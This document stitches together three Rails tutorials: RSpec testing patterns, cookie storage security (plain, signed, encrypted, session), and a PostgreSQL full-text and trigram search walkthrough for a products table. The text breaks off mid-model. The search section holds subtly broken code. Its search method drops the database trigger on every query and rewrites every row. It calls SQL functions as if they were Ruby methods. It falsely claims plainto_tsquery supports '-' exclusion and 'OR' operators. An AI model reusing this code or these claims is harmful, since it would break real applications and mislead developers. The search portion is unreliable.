The Building Blocks

describe and context

RSpec.describe User do
  describe "#full_name" do
    context "when first and last name are present" do
      # tests here
    end

    context "when only first name is present" do
      # tests here
    end
  end

  describe ".active_users" do
    context "with active users in database" do
      # tests here
    end
  end
end

it – Individual Test Cases

it "returns the user's full name" do
  user = User.new(first_name: "John", last_name: "Doe")
  expect(user.full_name).to eq("John Doe")
end

it "handles missing last name gracefully" do
  user = User.new(first_name: "John")
  expect(user.full_name).to eq("John")
end

Core RSpec Methods

let and let!

Lazy Evaluation with let
RSpec.describe Session::Discount do
  let(:cookies) { CookiesStub.new }
  let(:code) { create_code(10) }
  let(:customer) { init_customer }
  let(:customer_code) { create_customer_code(customer) }

  it "uses lazy evaluation" do
    # code is only created when first accessed
    expect(code.amount).to eq(10)
  end
end
Immediate Evaluation with let!
let!(:user) { User.create(name: "John") }  # Created immediately
let(:profile) { user.profile }             # Created when accessed

it "has user already created" do
  expect(User.count).to eq(1)  # user already exists
end

subject

Implicit Subject
RSpec.describe User do
  let(:user_params) { { name: "John", email: "john@example.com" } }

  subject { User.new(user_params) }

  it { is_expected.to be_valid }
  it { is_expected.to respond_to(:full_name) }
end
Named Subject
describe '#initial_discount' do
  subject(:initial_discount_in_rupee) { 
    described_class.new(cookies: cookies).initial_discount_in_rupee 
  }

  it 'returns initial discount for customer' do
    accessor.set_customer_code(customer_code: customer_code)
    expect(initial_discount_in_rupee).to eq(expected_amount)
  end
end

expect and Matchers

Basic Matchers
# Equality
expect(user.name).to eq("John")
expect(user.age).to be > 18
expect(user.email).to include("@")

# Boolean checks
expect(user).to be_valid
expect(user.active?).to be true
expect(user.admin?).to be_falsy

# Type checks
expect(user.created_at).to be_a(Time)
expect(user.tags).to be_an(Array)
Collection Matchers
expect(users).to include(john_user)
expect(user.roles).to contain_exactly("admin", "user")
expect(shopping_cart.items).to be_empty
expect(search_results).to have(3).items
String Matchers
expect(user.email).to match(/\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i)
expect(response.body).to include("Welcome")
expect(error_message).to start_with("Error:")
expect(success_message).to end_with("successfully!")

Rails 7+ Integration

Rails Helper Setup

# spec/rails_helper.rb
require 'spec_helper'
ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'

abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'rspec/rails'

RSpec.configure do |config|
  config.fixture_path = "#{::Rails.root}/spec/fixtures"
  config.use_transactional_fixtures = true
  config.infer_spec_type_from_file_location!
  config.filter_rails_from_backtrace!
end

Testing Controllers

RSpec.describe Api::V1::SessionsController, type: :controller do
  let(:user) { create(:user) }
  let(:valid_params) { { email: user.email, password: "password" } }

  describe "POST #create" do
    context "with valid credentials" do
      it "returns success response" do
        post :create, params: valid_params
        expect(response).to have_http_status(:success)
        expect(JSON.parse(response.body)["success"]).to be true
      end

      it "sets authentication token" do
        post :create, params: valid_params
        expect(response.cookies["auth_token"]).to be_present
      end
    end

    context "with invalid credentials" do
      it "returns unauthorized status" do
        post :create, params: { email: user.email, password: "wrong" }
        expect(response).to have_http_status(:unauthorized)
      end
    end
  end
end

Testing Models

RSpec.describe User, type: :model do
  describe "validations" do
    it { is_expected.to validate_presence_of(:email) }
    it { is_expected.to validate_uniqueness_of(:email) }
    it { is_expected.to validate_length_of(:password).is_at_least(8) }
  end

  describe "associations" do
    it { is_expected.to have_many(:orders) }
    it { is_expected.to belong_to(:organization) }
    it { is_expected.to have_one(:profile) }
  end

  describe "scopes" do
    let!(:active_user) { create(:user, :active) }
    let!(:inactive_user) { create(:user, :inactive) }

    it "returns only active users" do
      expect(User.active).to include(active_user)
      expect(User.active).not_to include(inactive_user)
    end
  end
end

Testing Scenarios

Testing Service Objects

RSpec.describe Session::Discount do
  let(:cookies) { CookiesStub.new }
  let(:accessor) { Session::CookieDiscount.new(cookies) }

  describe '#initialize' do
    it 'calls ClearDiscountCode' do
      expect_any_instance_of(Session::ClearDiscountCode).to receive(:run)
      described_class.new(cookies: cookies)
    end

    it 'removes discount_code if referral_code presented' do
      accessor.set_code(discount)
      accessor.set_referral_code(referral_code: code)

      described_class.new(cookies: cookies)
      expect(accessor.discount).to be nil
    end
  end
end

Testing API Endpoints

RSpec.describe "API V1 Sessions", type: :request do
  let(:headers) { { "Content-Type" => "application/json" } }

  describe "POST /api/v1/sessions" do
    let(:user) { create(:user) }
    let(:params) do
      {
        session: {
          email: user.email,
          password: "password"
        }
      }
    end

    it "creates a new session" do
      post "/api/v1/sessions", params: params.to_json, headers: headers

      expect(response).to have_http_status(:created)
      expect(json_response["user"]["id"]).to eq(user.id)
      expect(json_response["token"]).to be_present
    end

    context "with invalid credentials" do
      before { params[:session][:password] = "wrong_password" }

      it "returns error" do
        post "/api/v1/sessions", params: params.to_json, headers: headers

        expect(response).to have_http_status(:unauthorized)
        expect(json_response["error"]).to eq("Invalid credentials")
      end
    end
  end
end

Testing Background Jobs

RSpec.describe EmailNotificationJob, type: :job do
  include ActiveJob::TestHelper

  let(:user) { create(:user) }

  describe "#perform" do
    it "sends welcome email" do
      expect {
        EmailNotificationJob.perform_now(user.id, "welcome")
      }.to change { ActionMailer::Base.deliveries.count }.by(1)
    end

    it "enqueues job" do
      expect {
        EmailNotificationJob.perform_later(user.id, "welcome")
      }.to have_enqueued_job(EmailNotificationJob)
    end
  end
end

Testing with Database Transactions

RSpec.describe OrderProcessor do
  describe "#process" do
    let(:order) { create(:order, :pending) }
    let(:payment_method) { create(:payment_method) }

    it "processes order successfully" do
      expect {
        OrderProcessor.new(order).process(payment_method)
      }.to change { order.reload.status }.from("pending").to("completed")
    end

    it "handles payment failures" do
      allow(payment_method).to receive(:charge).and_raise(PaymentError)

      expect {
        OrderProcessor.new(order).process(payment_method)
      }.to raise_error(PaymentError)

      expect(order.reload.status).to eq("failed")
    end
  end
end

Advanced Features

Shared Examples

# spec/support/shared_examples/auditable.rb
RSpec.shared_examples "auditable" do
  it "tracks creation" do
    expect(subject.created_at).to be_present
    expect(subject.created_by).to eq(current_user)
  end

  it "tracks updates" do
    subject.update(name: "Updated Name")
    expect(subject.updated_by).to eq(current_user)
  end
end

# Usage in specs
RSpec.describe User do
  let(:current_user) { create(:user) }
  subject { create(:user) }

  it_behaves_like "auditable"
end

Custom Matchers

# spec/support/matchers/be_valid_email.rb
RSpec::Matchers.define :be_valid_email do
  match do |actual|
    actual =~ /\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i
  end

  failure_message do |actual|
    "expected #{actual} to be a valid email address"
  end
end

# Usage
expect(user.email).to be_valid_email

Hooks and Callbacks

RSpec.describe User do
  before(:each) do
    @original_time = Time.current
    travel_to Time.zone.parse("2023-01-01 12:00:00")
  end

  after(:each) do
    travel_back
  end

  before(:all) do
    # Runs once before all tests in this describe block
    @test_data = create_test_data
  end

  around(:each) do |example|
    Rails.logger.silence do
      example.run
    end
  end
end

Stubbing and Mocking

describe "external API integration" do
  let(:api_client) { instance_double("APIClient") }

  before do
    allow(APIClient).to receive(:new).and_return(api_client)
  end

  it "calls external service" do
    expect(api_client).to receive(:get_user_data).with(user.id)
      .and_return({ name: "John", email: "john@example.com" })

    result = UserDataService.fetch(user.id)
    expect(result[:name]).to eq("John")
  end

  it "handles API errors gracefully" do
    allow(api_client).to receive(:get_user_data).and_raise(Net::TimeoutError)

    expect {
      UserDataService.fetch(user.id)
    }.to raise_error(ServiceUnavailableError)
  end
end

Testing Time-dependent Code

describe "subscription expiry" do
  let(:subscription) { create(:subscription, expires_at: 2.days.from_now) }

  it "is not expired when current" do
    expect(subscription).not_to be_expired
  end

  it "is expired when past expiry date" do
    travel_to 3.days.from_now do
      expect(subscription).to be_expired
    end
  end
end

Factory Bot Integration

Basic Factory Setup

# spec/factories/users.rb
FactoryBot.define do
  factory :user do
    sequence(:email) { |n| "user#{n}@example.com" }
    first_name { "John" }
    last_name { "Doe" }
    password { "password123" }

    trait :admin do
      role { "admin" }
    end

    trait :with_profile do
      after(:create) do |user|
        create(:profile, user: user)
      end
    end

    factory :admin_user, traits: [:admin]
  end
end

# Usage in tests
let(:user) { create(:user) }
let(:admin) { create(:user, :admin) }
let(:user_with_profile) { create(:user, :with_profile) }

Advanced Factory Patterns

# spec/factories/orders.rb
FactoryBot.define do
  factory :order do
    user
    total_amount { 100.00 }
    status { "pending" }

    factory :completed_order do
      status { "completed" }
      completed_at { Time.current }

      after(:create) do |order|
        create_list(:order_item, 3, order: order)
      end
    end
  end
end

Testing Different Types

Feature Tests (System Tests)

RSpec.describe "User Registration", type: :system do
  it "allows user to register" do
    visit "/signup"

    fill_in "Email", with: "test@example.com"
    fill_in "Password", with: "password123"
    fill_in "Confirm Password", with: "password123"

    click_button "Sign Up"

    expect(page).to have_content("Welcome!")
    expect(page).to have_current_path("/dashboard")
  end
end

Mailer Tests

RSpec.describe UserMailer, type: :mailer do
  describe "#welcome_email" do
    let(:user) { create(:user) }
    let(:mail) { UserMailer.welcome_email(user) }

    it "sends to correct recipient" do
      expect(mail.to).to eq([user.email])
    end

    it "has correct subject" do
      expect(mail.subject).to eq("Welcome to Our App!")
    end

    it "includes user name in body" do
      expect(mail.body.encoded).to include(user.first_name)
    end
  end
end

Helper Tests

RSpec.describe ApplicationHelper, type: :helper do
  describe "#format_currency" do
    it "formats positive amounts" do
      expect(helper.format_currency(100.50)).to eq("$100.50")
    end

    it "handles zero amounts" do
      expect(helper.format_currency(0)).to eq("$0.00")
    end

    it "formats negative amounts" do
      expect(helper.format_currency(-50.25)).to eq("-$50.25")
    end
  end
end

Best Practices

1. Clear Test Structure

# Good: Clear, descriptive names
describe User do
  describe "#full_name" do
    context "when both names are present" do
      it "returns concatenated first and last name" do
        # test implementation
      end
    end
  end
end

# Bad: Unclear names
describe User do
  it "works" do
    # test implementation
  end
end

2. One Assertion Per Test

# Good: Single responsibility
it "validates email presence" do
  user = User.new(email: nil)
  expect(user).not_to be_valid
end

it "validates email format" do
  user = User.new(email: "invalid-email")
  expect(user).not_to be_valid
end

# Bad: Multiple assertions
it "validates email" do
  user = User.new(email: nil)
  expect(user).not_to be_valid

  user.email = "invalid-email"
  expect(user).not_to be_valid

  user.email = "valid@email.com"
  expect(user).to be_valid
end

3. Use let for Test Data

# Good: Reusable and lazy-loaded
let(:user) { create(:user, email: "test@example.com") }
let(:order) { create(:order, user: user, total: 100) }

it "calculates tax correctly" do
  expect(order.tax_amount).to eq(8.50)
end

# Bad: Repeated setup
it "calculates tax correctly" do
  user = create(:user, email: "test@example.com")
  order = create(:order, user: user, total: 100)
  expect(order.tax_amount).to eq(8.50)
end

4. Meaningful Error Messages

# Good: Custom error messages
expect(discount.amount).to eq(50), 
  "Expected discount amount to be $50 for premium users"

# Good: Descriptive matchers
expect(user.subscription).to be_active,
  "User subscription should be active after successful payment"

5. Test Edge Cases

describe "#divide" do
  it "divides positive numbers" do
    expect(calculator.divide(10, 2)).to eq(5)
  end

  it "handles division by zero" do
    expect { calculator.divide(10, 0) }.to raise_error(ZeroDivisionError)
  end

  it "handles negative numbers" do
    expect(calculator.divide(-10, 2)).to eq(-5)
  end

  it "handles float precision" do
    expect(calculator.divide(1, 3)).to be_within(0.001).of(0.333)
  end
end

Rails 7+ Specific Features

Testing with ActionText

RSpec.describe Post, type: :model do
  describe "rich text content" do
    let(:post) { create(:post) }

    it "can store rich text content" do
      post.content = "<p>Hello <strong>world</strong></p>"
      expect(post.content.to_s).to include("Hello")
      expect(post.content.to_s).to include("<strong>world</strong>")
    end
  end
end

Testing with Active Storage

RSpec.describe User, type: :model do
  describe "avatar attachment" do
    let(:user) { create(:user) }
    let(:image) { fixture_file_upload("spec/fixtures/avatar.jpg", "image/jpeg") }

    it "can attach avatar" do
      user.avatar.attach(image)
      expect(user.avatar).to be_attached
      expect(user.avatar.content_type).to eq("image/jpeg")
    end
  end
end

Testing Hotwire/Turbo

RSpec.describe "Todo Management", type: :system do
  it "updates todo via turbo stream" do
    todo = create(:todo, title: "Original Title")

    visit todos_path
    click_link "Edit"
    fill_in "Title", with: "Updated Title"
    click_button "Update"

    expect(page).to have_content("Updated Title")
    expect(page).not_to have_content("Original Title")
    # Verify it was updated via AJAX, not full page reload
    expect(page).not_to have_selector(".flash-message")
  end
end

Configuration and Setup

RSpec Configuration

# spec/rails_helper.rb
RSpec.configure do |config|
  # Database cleaner
  config.use_transactional_fixtures = true

  # Factory Bot
  config.include FactoryBot::Syntax::Methods

  # Custom helpers
  config.include AuthenticationHelpers, type: :request
  config.include ControllerHelpers, type: :controller

  # Filtering
  config.filter_run_when_matching :focus
  config.example_status_persistence_file_path = "spec/examples.txt"

  # Parallel execution
  config.order = :random
  Kernel.srand config.seed
end

Database Cleaner Setup

# spec/rails_helper.rb
require 'database_cleaner/active_record'

RSpec.configure do |config|
  config.before(:suite) do
    DatabaseCleaner.strategy = :transaction
    DatabaseCleaner.clean_with(:truncation)
  end

  config.around(:each) do |example|
    DatabaseCleaner.cleaning do
      example.run
    end
  end
end

This comprehensive guide covers the essential RSpec patterns you’ll use in Rails 7+ applications. The examples shown are based on real-world scenarios and follow current best practices for maintainable, reliable test suites.

Remember: Good tests are documentation for your code – they should clearly express what your application does and how it should behave under different conditions.


The Complete Guide to Cookie Storage in Rails 7: Security, Performance, and Best Practices

Cookies are fundamental to web applications, but choosing the right storage method can make or break your app’s security and performance. Rails 7 offers multiple cookie storage mechanisms, each with distinct security properties and use cases. Let’s explore when to use each approach and why it matters.

The Cookie Storage Spectrum

Rails provides four main cookie storage methods, each offering different levels of security:

# 1. Plain cookies - readable and modifiable by client
cookies[:theme] = 'dark'

# 2. Signed cookies - readable but tamper-proof
cookies.signed[:discount_code] = 'SAVE10'

# 3. Encrypted cookies - hidden and tamper-proof
cookies.encrypted[:user_preferences] = { notifications: true }

# 4. Session storage - server-side with encrypted session cookie
session[:current_user_id] = user.id

1. Plain Cookies: When Transparency is Acceptable

Use for: Non-sensitive data where client-side reading/modification is acceptable or even desired.

# Setting a plain cookie
cookies[:theme] = 'dark'
cookies[:language] = 'en'
cookies[:consent_given] = 'true'

# With expiration
cookies[:temporary_banner_dismissed] = {
  value: 'true',
  expires: 1.day.from_now
}

Security implications:

  • ✅ Fast and simple
  • ❌ Completely readable in browser dev tools
  • ❌ User can modify values freely
  • ❌ No protection against tampering

Best for:

  • UI preferences (theme, language)
  • Non-critical flags (banner dismissal)
  • Data you want JavaScript to access easily

2. Signed Cookies: Tamper-Proof but Visible

Signed cookies prevent modification while remaining readable. Rails uses HMAC-SHA1 with your secret_key_base to create a cryptographic signature.

# Setting signed cookies
cookies.signed[:discount_code] = 'SAVE10'
cookies.signed[:referral_source] = 'google_ads'

# Reading signed cookies
discount = cookies.signed[:discount_code]  # Returns 'SAVE10' or nil if tampered

How it works:

# Rails internally does:
# 1. Create signature: HMAC-SHA1(secret_key_base, 'SAVE10')
# 2. Store: Base64.encode64('SAVE10--signature')
# 3. On read: verify signature matches content

Security implications:

  • ✅ Tamper-proof – modification invalidates the cookie
  • ✅ Prevents privilege escalation attacks
  • ⚠️ Content still visible (Base64 encoded)
  • ❌ Not suitable for truly sensitive data

Real-world example from our codebase:

# lib/session/cookie_discount_accessor.rb
def discount_code
  # Prevents users from changing 'SAVE10' to 'SAVE50' in browser
  @cookies.signed[:discount] && DiscountCode.find_by(name: @cookies.signed[:discount])
end

def set_discount_code(code)
  @cookies.signed[:discount] = {
    value: code.name,
    expires: code.expiration || 30.days.from_now
  }
end

Best for:

  • Discount codes
  • Referral tracking
  • Non-sensitive IDs that shouldn’t be modified
  • Data integrity without confidentiality requirements

3. Encrypted Cookies: Maximum Security

Encrypted cookies are both signed and encrypted, making them unreadable and tamper-proof.

# Setting encrypted cookies
cookies.encrypted[:credit_card_last4] = '4242'
cookies.encrypted[:user_preferences] = {
  notifications: true,
  marketing_emails: false
}

# Reading encrypted cookies
preferences = cookies.encrypted[:user_preferences]

Security implications:

  • ✅ Content completely hidden from client
  • ✅ Tamper-proof
  • ✅ Suitable for sensitive data
  • ⚠️ Slightly higher CPU overhead
  • ⚠️ Size limitations (4KB total per domain)

Best for:

  • Personal information
  • Financial data
  • Complex user preferences
  • Any data you’d store in a database but need client-side

4. Session Storage: Server-Side Security

Rails sessions are encrypted cookies by default, but the data is conceptually server-side.

# Session storage
session[:current_user_id] = user.id
session[:shopping_cart] = cart.to_h
session[:two_factor_verified] = true

# Configuration in config/application.rb
config.session_store :cookie_store, key: '_myapp_session'

Security implications:

  • ✅ Encrypted by default
  • ✅ Automatic expiration handling
  • ✅ CSRF protection integration
  • ⚠️ 4KB size limit
  • ⚠️ Lost on cookie deletion

Best for:

  • User authentication state
  • Shopping carts
  • Multi-step form data
  • Security-sensitive flags

Security Best Practices

1. Choose the Right Storage Method

# ❌ Don't store sensitive data in plain cookies
cookies[:ssn] = '123-45-6789'  # Visible to everyone!

# ✅ Use appropriate security level
cookies.encrypted[:ssn] = '123-45-6789'  # Hidden and protected
session[:user_id] = user.id              # Server-side, encrypted

2. Set Proper Cookie Attributes

# Secure cookies for HTTPS
cookies[:theme] = {
  value: 'dark',
  secure: Rails.env.production?,  # HTTPS only
  httponly: true,                 # No JavaScript access
  samesite: :strict              # CSRF protection
}

3. Handle Cookie Tampering Gracefully

def current_discount_code
  code_name = cookies.signed[:discount]
  return nil unless code_name

  DiscountCode.find_by(name: code_name)&.tap do |code|
    # Remove if expired or invalid
    cookies.delete(:discount) unless code.usable?
  end
end

4. Use Expiration Strategically

# Short-lived sensitive data
cookies.signed[:password_reset_token] = {
  value: token,
  expires: 15.minutes.from_now,
  secure: true,
  httponly: true
}

# Long-lived preferences
cookies.encrypted[:user_preferences] = {
  value: preferences.to_json,
  expires: 1.year.from_now
}

Advanced Patterns

1. Cookie Accessor Classes

Create dedicated classes for complex cookie management:

class Session::CookieDiscountAccessor
  def initialize(cookies)
    @cookies = cookies
  end

  def discount_code
    @cookies.signed[:discount] && DiscountCode.find_by(name: @cookies.signed[:discount])
  end

  def set_discount_code(code)
    @cookies.signed[:discount] = {
      value: code.name,
      expires: code.expiration || 30.days.from_now
    }
  end

  def remove_discount_code
    @cookies.delete(:discount)
  end
end

2. Validation and Cleanup

class Session::CheckAndRemoveDiscountCode
  def initialize(cookies:)
    @accessor = Session::CookieDiscountAccessor.new(cookies)
  end

  def run
    # Remove referral conflicts
    @accessor.referral_code && @accessor.remove_discount_code && return
      
    # Remove expired codes
    discount_code = @accessor.discount_code
    @accessor.remove_discount_code if discount_code && !discount_code.usable?
  end
end

3. Error Handling for Corrupted Cookies

def safe_read_encrypted_cookie(key)
  cookies.encrypted[key]
rescue ActiveSupport::MessageVerifier::InvalidSignature,
       ActiveSupport::MessageEncryptor::InvalidMessage
  # Cookie was corrupted or created with different secret
  cookies.delete(key)
  nil
end

Performance Considerations

Cookie Size Limits

  • Total limit: 4KB per domain
  • Individual limit: ~4KB per cookie
  • Count limit: ~50 cookies per domain

CPU Overhead

# Benchmark different storage methods
require 'benchmark'

Benchmark.bm do |x|
  x.report("plain")     { 1000.times { cookies[:test] = 'value' } }
  x.report("signed")    { 1000.times { cookies.signed[:test] = 'value' } }
  x.report("encrypted") { 1000.times { cookies.encrypted[:test] = 'value' } }
end

# Results (approximate):
#                user     system      total        real
# plain      0.001000   0.000000   0.001000 (  0.001000)
# signed     0.010000   0.000000   0.010000 (  0.009000)
# encrypted  0.050000   0.000000   0.050000 (  0.048000)

Configuration and Security Headers

Session Configuration

# config/application.rb
config.session_store :cookie_store,
  key: '_myapp_session',
  secure: Rails.env.production?,
  httponly: true,
  expire_after: 14.days,
  same_site: :lax

Security Headers

# config/application.rb
config.force_ssl = true  # HTTPS in production

# Use Secure Headers gem
SecureHeaders::Configuration.default do |config|
  config.cookies = {
    secure: true,
    httponly: true,
    samesite: {
      lax: true
    }
  }
end

Testing Cookie Security

# spec/lib/session/coupon_code_spec.rb
RSpec.describe Session::CouponCode do
  describe 'cookie tampering protection' do
    it 'handles corrupted signed cookies gracefully' do
      # Simulate tampered cookie
      cookies.signed[:discount] = 'SAVE10'
      cookies[:discount] = 'tampered_value'  # Direct manipulation

      accessor = Session::CookieDiscountAccessor.new(cookies)
      expect(accessor.discount_code).to be_nil
    end
  end
end

Migration Strategies

Upgrading Cookie Security

def upgrade_cookie_security
  # Read from old plain cookie
  if (old_value = cookies[:legacy_data])
    # Migrate to encrypted
    cookies.encrypted[:legacy_data] = old_value
    cookies.delete(:legacy_data)
  end
end

Handling Secret Key Rotation

# config/credentials.yml.enc
secret_key_base: new_secret
legacy_secret_key_base: old_secret

# In application
def read_with_fallback(key)
  cookies.encrypted[key] || begin
    # Try with old secret
    old_verifier = ActiveSupport::MessageEncryptor.new(
      Rails.application.credentials.legacy_secret_key_base
    )
    old_verifier.decrypt_and_verify(cookies[key])
  rescue
    nil
  end
end

Quick Decision Matrix

Data TypeSensitivityClient Access NeededRecommended Storage
Theme preferencesLowYesPlain cookies
Discount codesMediumNoSigned cookies
User settingsMediumNoEncrypted cookies
AuthenticationHighNoSession
Credit card dataHighNoDatabase + session ID
Shopping cartMediumNoSession or encrypted
CSRF tokensHighLimitedSession (built-in)

Common Pitfalls to Avoid

  1. Don’t mix storage types for the same data
   # ❌ Inconsistent
   cookies[:user_id] = user.id        # Sometimes
   cookies.signed[:user_id] = user.id # Other times

   # ✅ Consistent
   session[:user_id] = user.id        # Always
  1. Don’t store large objects in cookies
   # ❌ Will hit 4KB limit
   cookies.encrypted[:full_user] = user.to_json

   # ✅ Store reference
   session[:user_id] = user.id
  1. Don’t forget expiration
   # ❌ Never expires
   cookies.signed[:temp_token] = token

   # ✅ Proper expiration
   cookies.signed[:temp_token] = {
     value: token,
     expires: 1.hour.from_now
   }

Conclusion

Cookie storage in Rails 7 offers a rich toolkit for different security and performance needs. The key is matching the storage method to your data’s sensitivity and access patterns:

  • Plain cookies for non-sensitive, client-accessible data
  • Signed cookies when you need tamper protection but not confidentiality
  • Encrypted cookies for sensitive data that must remain client-side
  • Session storage for server-side state with automatic encryption

Remember: the best cookie strategy combines appropriate storage methods with proper security headers, validation, and graceful error handling. When in doubt, err on the side of more security rather than less.

The Rails cookie system is designed to make secure defaults easy—take advantage of it to build applications that are both performant and secure.


Rails 8 Application: Implement PostgreSQL search on products

Here’s a concise analysis and solution:

Full-Text Search Strategy

For name column:

  • Recommended: Use a GIN index with pg_trgm extension
  • Benefits:
    • Faster than LIKE/ILIKE
    • Supports partial matches
    • Handles typos with similarity function

For description column:

  • Recommendation: Add a separate searchable column
  • Why?:
    • Text fields can be large
    • Better to index a pre-processed version
    • Consider using tsvector for better performance

Implementation Steps:

  1. First, create a migration to update the indexes:
# db/migrate/[timestamp]_add_search_to_products.rb

class AddSearchToProducts < ActiveRecord::Migration[8.0]
  def change
    # Enable pg_trgm extension for fuzzy matching
    enable_extension 'pg_trgm' unless extension_enabled?('pg_trgm')
    
    # Add a searchable column for description (optional)
    add_column :products, :searchable_description, :tsvector
    add_index :products, :searchable_description, using: :gin

    # Replace the simple index with a GIN index for name
    remove_index :products, name: 'idx_products_name'
    add_index :products, 'name gin_trgm_ops', using: :gin, name: 'index_products_on_name_trgm'
    
    # Optional: Add a generated column for combined search
    execute <<-SQL
      UPDATE products 
      SET searchable_description = to_tsvector('english', coalesce(description, ''));
    SQL
  end
end
  1. In your Product model:
# app/models/product.rb
class Product < ApplicationRecord
  # For name search
  def self.search_by_name(query)
    where("name % ?", query)
      .order("similarity(name, #{ActiveRecord::Base.connection.quote(query)}) DESC")
  end

  # For description search (if needed)
  def self.search_in_description(query)
    where("searchable_description @@ plainto_tsquery('english', :q)", q: query)
  end
end

Usage:

# Search in name (fuzzy matching)
products = Product.search_by_name("laptp")  # Will match "laptop"

# Search in description (exact matching)
products = Product.search_in_description("high performance")

Recommendation:

  1. Start with name-only search – It’s the most common use case
  2. Monitor performance – Check query times with EXPLAIN ANALYZE
  3. Add description search later if needed, using the searchable_description column

Let’s implement a unified search that looks for matches in both name and description. Here’s a streamlined approach using PostgreSQL’s full-text search capabilities:

1. First, create a migration to add search functionality:

# db/migrate/[timestamp]_add_search_to_products.rb
class AddSearchToProducts < ActiveRecord::Migration[8.0]
  def up
    # Enable necessary extensions
    enable_extension 'pg_trgm' unless extension_enabled?('pg_trgm')
    enable_extension 'unaccent' unless extension_enabled?('unaccent')

    # Add a generated column for combined search
    add_column :products, :searchable, :tsvector
    execute <<-SQL
      UPDATE products 
      SET searchable = 
        setweight(to_tsvector('english', coalesce(name, '')), 'A') ||
        setweight(to_tsvector('english', coalesce(description, '')), 'B');
    SQL

    # Create a function to automatically update the searchable column
    execute <<-SQL
      CREATE OR REPLACE FUNCTION products_search_trigger() RETURNS trigger AS $$
      begin
        new.searchable :=
          setweight(to_tsvector('english', coalesce(new.name, '')), 'A') ||
          setweight(to_tsvector('english', coalesce(new.description, '')), 'B');
        return new;
      end
      $$ LANGUAGE plpgsql;
    SQL

    # Create a trigger to update the searchable column
    execute <<-SQL
      CREATE TRIGGER tsvector_update_products BEFORE INSERT OR UPDATE
      ON products FOR EACH ROW EXECUTE FUNCTION products_search_trigger();
    SQL

    # Create a GIN index for the searchable column
    add_index :products, :searchable, using: :gin, name: 'index_products_on_searchable'
  end

  def down
    remove_index :products, name: 'index_products_on_searchable'
    execute 'DROP TRIGGER IF EXISTS tsvector_update_products ON products'
    execute 'DROP FUNCTION IF EXISTS products_search_trigger()'
    remove_column :products, :searchable
  end
end

2. In our Product model, add the search method:

ruby# app/models/product.rb
class Product < ApplicationRecord
  # ... existing code ...

  def self.search_in_name_and_desc(query)
    return all if query.blank?

    # Remove any existing tsvector_update_products trigger to prevent recursion
    connection.execute('DROP TRIGGER IF EXISTS tsvector_update_products ON products')

    # Update the searchable column for all records
    Product.find_each do |product|
      product.update_columns(
        searchable: 
          set_weight(to_tsvector('english', product.name || ' '), 'A') ||
          set_weight(to_tsvector('english', product.description || ' '), 'B')
      )
    end

    # Search using the tsvector column
    where("searchable @@ plainto_tsquery('english', :q)", q: query)
      .order("ts_rank(searchable, plainto_tsquery('english', :q)) DESC", q: query)
  end

  private

  def self.set_weight(vector, weight)
    Arel::Nodes::InfixOperation.new('||', 
      Arel::Nodes::InfixOperation.new('||',
        Arel::Nodes::SqlLiteral.new("setweight("),
        Arel::Nodes::Grouping.new(vector)
      ),
      Arel::Nodes::SqlLiteral.new(",'#{weight}')")
    )
  end
end

3. Usage:

# Basic search (searches both name and description)
results = Product.search_in_name_and_desc("laptop")

# You can chain other scopes
results = Product.in_stock.search_in_name_and_desc("gaming laptop").order(price: :asc)

How It Works:

  1. Weighted Search:
    • Name matches (‘A’ weight) are ranked higher than description matches (‘B’ weight)
    • Full-text search handles word stemming and stop words automatically
  2. Performance:
    • The GIN index on the searchable tsvector column makes searches fast
    • The trigger keeps the searchable column in sync automatically
  3. Features:
    • Handles partial matches
    • Ranks results by relevance
    • Case-insensitive
    • Handles common words and stop words

Test the search:

# Test with different search terms
Product.search_in_name_and_desc("gaming laptop")  # Matches in either name or description

Product.search_in_name_and_desc("gaming -mouse")  # Excludes products with "mouse"

Product.search_in_name_and_desc("gaming OR laptop")  # Either term

This implementation gives you a single, efficient search method that handles both name and description fields with proper ranking and performance characteristics.


What unaccent Does:

The unaccent extension in PostgreSQL is a text search dictionary that removes accents (diacritic signs) from lexemes, making searches accent-insensitive. Here’s why it’s useful:

  1. Normalizes Text: Converts accented characters to their unaccented equivalents
    • Example: café → cafeHéllo → Hello
  2. Improves Search:
    • Without it: Searching for “cafe” won’t match “café”
    • With it: Both “cafe” and “café” will match
  3. Common Use Cases:
    • User search functionality where you want to ignore accents
    • International product catalogs
    • User names or locations with special characters

Example in Our Code:

In your search migration, it ensures that:

  • A search for “resume” will also match “résumé”
  • A search for “cafe” will match “café”
  • “Jalapeño” matches “jalapeno”

How It Works with Your Search:

When combined with pg_trgm, it makes your search more user-friendly by:

  1. Removing accents from both the search term and the stored text
  2. Then performing the similarity comparison

Disabling/Enabling:

  • The extension is enabled only if it’s not already enabled (unless extension_enabled?('unaccent'))
  • It’s safe to keep enabled as it doesn’t affect existing data unless explicitly used

 (PostgreSQL Trigram) extension is specifically designed for fuzzy string matching and searching. Here’s what it does:

Key Features of pg_trgm:

  1. Trigram Matching:
    • Breaks strings into groups of 3 consecutive characters
    • Example: “hello” → [” h”, ” he”, “hel”, “ell”, “llo”, “lo “, “o “]
    • Uses these trigrams to find similar strings
  2. Fuzzy Search Capabilities:
    • Finds matches even with typos or slight misspellings
    • Ranks results by similarity
    • Works well for “did you mean?” type suggestions
  3. Common Operators:
    • % – Similarity operator (returns true if strings are similar)
    • <-> – Distance operator (returns a distance metric)
    • %> – Word similarity (best match of any word in the search)

In Our Implementation:

# This uses pg_trgm's similarity matching
where("name % ?", search_term)
  .order("similarity(name, #{ActiveRecord::Base.connection.quote(search_term)}) DESC")

Example Searches:

# Finds "Samsung" even if spelled "Samsng" or "Samsing"
Product.where("name % ?", "Samsng")

# Ranks "iPhone 13" higher than "iPhone 12" when searching for "iPhone 13 Pro"
Product.where("name % ?", "iPhone 13 Pro").order("name <-> 'iPhone 13 Pro'")

Benefits in Our Case:

  1. Typo Tolerance: Users can make small mistakes and still find products
  2. Partial Matches: Finds “phone” in “smartphone”
  3. Ranked Results: More relevant matches appear first

The combination of pg_trgm with unaccent (which handles accents) gives you robust, user-friendly search capabilities right in the database.

Final model and migration

Product Model:

class Product < ApplicationRecord
  has_many :order_items, dependent: :destroy
  has_many :orders, through: :order_items

  validates :name, presence: true
  validates :price, presence: true, numericality: { greater_than: 0 }
  validates :stock, presence: true, numericality: { greater_than_or_equal_to: 0 }

  # Search across both name and description
  # @param query [String] search term
